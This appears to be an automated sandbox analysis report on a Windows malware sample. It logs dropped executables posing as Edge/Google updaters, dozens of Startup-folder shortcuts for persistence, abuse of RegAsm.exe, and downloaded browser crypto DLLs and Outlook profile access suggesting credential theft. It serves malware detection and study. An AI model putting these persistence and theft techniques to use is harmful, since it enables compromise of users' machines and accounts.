Source: LKMService_1950dc17ab0f4160aae4b8a0fdba971c.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_bfce9b64a6284437b2372a7b2418295f.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 0000000F.00000002.2358493205.000000006B49D000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: LKMService.exe, 00000006.00000002.2006855231.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1976790281.0000000000956000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 0000000F.00000002.2367713660.000000006B65F000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: LKMService.exe, 00000006.00000002.2016752958.0000000002611000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1977952674.0000000002851000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb u source: LKMService.exe, 00000011.00000002.1976790281.0000000000956000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 0000001E.00000002.2592999435.00000000387A7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 0000001E.00000002.2586703649.000000002C8C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 0000000F.00000002.2358493205.000000006B49D000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr
Source:	Binary string: \mscorlib.pdb source: LKMService.exe, 00000011.00000002.1976790281.0000000000956000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: LKMService.exe, 00000006.00000002.2006855231.00000000009EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: LKMService.exe, 00000006.00000002.2016752958.0000000002611000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1977952674.0000000002851000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb& source: LKMService.exe, 00000006.00000002.2006855231.00000000009AD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Wws\mscorlib.pdb source: LKMService.exe, 00000011.00000002.1976390085.0000000000738000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: LKMService.exe, 00000006.00000002.2016752958.0000000002611000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000006.00000002.2006855231.00000000009EB000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1977952674.0000000002851000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ystem.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: LKMService.exe, 00000011.00000002.1976790281.000000000098E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: LKMService.exe, 00000011.00000002.1976790281.0000000000956000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: LKMService.exe, 00000006.00000002.2016752958.0000000002611000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1977952674.0000000002851000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: $ws\mscorlib.pdba source: LKMService.exe, 00000006.00000002.2005439577.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: RegAsm.exe, 0000000F.00000002.2367713660.000000006B65F000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000010.00000002.2763255902.000000002256B000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3114645633.00000000200DB000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2947741085.000000002263B000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: LKMService.exe, 00000006.00000002.2016752958.0000000002611000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1977952674.0000000002851000.00000004.00000800.00020000.00000000.sdmp

Source: file.exe

Static PE information: 0x8B2EB2E2 [Wed Dec 30 13:04:34 2043 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

15_2_00419860

Source: 596a8ed0706146e48ded9036d0de8611.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x1eceb1
Source: 66fbfccd837ac_vadggdsa[1].exe.5.dr	Static PE information: real checksum: 0x695a1 should be: 0x6a530
Source: LKMService.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x9000
Source: SYvU5mYtoLg0LBOPe0pXYHty.exe.5.dr	Static PE information: real checksum: 0x537d7 should be: 0x61364
Source: file.exe	Static PE information: real checksum: 0x0 should be: 0x9000
Source: GoogleUpdater.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x9000
Source: 66fbfcc301a31_swws[1].exe.5.dr	Static PE information: real checksum: 0x537d7 should be: 0x61364

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_005662B0 push ecx; ret	5_2_005662C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041B035 push ecx; ret	15_2_0041B048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B45B536 push ecx; ret	15_2_6B45B549

Source: 596a8ed0706146e48ded9036d0de8611.exe.1.dr	Static PE information: section name: .text entropy: 7.999715150656324
Source: 66fbfcc301a31_swws[1].exe.5.dr	Static PE information: section name: .text entropy: 7.993937543381739
Source: 66fbfccd837ac_vadggdsa[1].exe.5.dr	Static PE information: section name: .text entropy: 7.995853836897514
Source: SYvU5mYtoLg0LBOPe0pXYHty.exe.5.dr	Static PE information: section name: .text entropy: 7.993937543381739

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KEHDBAEGII.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66fbfcc9963ca_ldfsna[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66fbfcc9963ca_ldfsna[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\CBFIIEHJDB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userCAAKKFHCFI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userBAKKEGCAAE.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userEHJDHJKFIE.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GHDHDBAECG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66fbfccd837ac_vadggdsa[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66fbfcc301a31_swws[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userDHDAFBFCFH.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KEHDBAEGII.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GHDHDBAECG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\CBFIIEHJDB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8739b66ba2a04fd0a320fa681982b133.lnk

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8739b66ba2a04fd0a320fa681982b133.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c0850bda939c43b1a76ee4454c07f9ef.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3a71cca9579748349fc1affd6b36eba4.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7ba8a225a37b42c58f6418ae64976efb.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f441c6ef3f8c4d6baaf89431fdc695c8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fa485a82d12e4fd789c2445af41212da.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_485b83aa429741dcb776592402747a5a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5d506a0aa16a4925a5cdd1c3979d20e0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8ad77b720f9a42c8977af2705e9ddf10.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_eca3ad28abbe450283aff29d494ed6a2.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ed935bc5db44418c9f56cf7b785f1e6a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_22c85930711e41eb9e3a1d6112b89721.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a51d9bb4b8241a988369d5a6aa9acd6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_107fa4e9473249e5ab5f0795712c2553.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e0c9534ce80c49c0af4bd52b42e11a12.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b1bb960a8ae34663bada21b1c0393545.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3e05732c2d0d4ea6b1d93b0f05c10f70.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a8b8f27eee314951801c76543389daea.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7001d526a2d647e4aaad0f739881a03a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_21d4923aa73142a49be84ce8bde9060d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9018a91a49f44b5f96200cf771c3fbef.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_698605bc9fe2419b840f9d3a55d634ea.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_17362a2652014a409b68fd9ebfa94d4c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d6858b43de354dd88b472458a9bc9e0b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4177619b61374f768b8d8a5d54d97036.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f133eb79cee444e89efc808a6e2b3ab3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e3f4fb73636f4fca83c9bd2085964f1a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6f6ae706c0f641dd931e5d0b5ed4724b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6ba5a904fb744f16bcad34df95bf7b7d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1acdb7c6cd464f8bbf053ba2e3c292f3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f7151759119841978dc64f02a3cf7575.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cdd3441cf435451cafc80df0b052efb8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2b8d7e8baeb9413bb5be22eea72c381c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3e121c1e1fec41f7ae729797b3f9a124.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b291156501f24c94aaf7f55cd06df300.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4f7959b6ce66415cbc94177055f7eb83.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8d16c3cbece245f19a4f890c4220581c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_525705db1b024948a3a63ea2168b1c83.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e0c47395e6c74fcd845a3269ef558b20.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9e24440e0b744680a33052034df043db.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b1529c818a6142048f9d94321c16100a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9efab2ffe062471f836440b153e26fb9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a2fbd2562a9c47f3bb321728d45174fd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a3a675ab04a6462c94d522f4f1c91070.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1950dc17ab0f4160aae4b8a0fdba971c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bfce9b64a6284437b2372a7b2418295f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6a6dff5aa45e418caf62b9ca4b78cd42.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2aa8fd5a8b00407abe6d375bb6c33eb7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8b0140124cb0452e974339ee088d90b3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4d47a5c509e64c64995ac0266ce71e85.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a2af4b412d214fd6bad4a26d9e0b3459.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_86a4598449ac48afb16cdf191fe9dd08.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_20598259efe14363887c9f5c20ad079e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_644d0edcd69d4559b0de6effc8f2f097.lnk	Jump to behavior
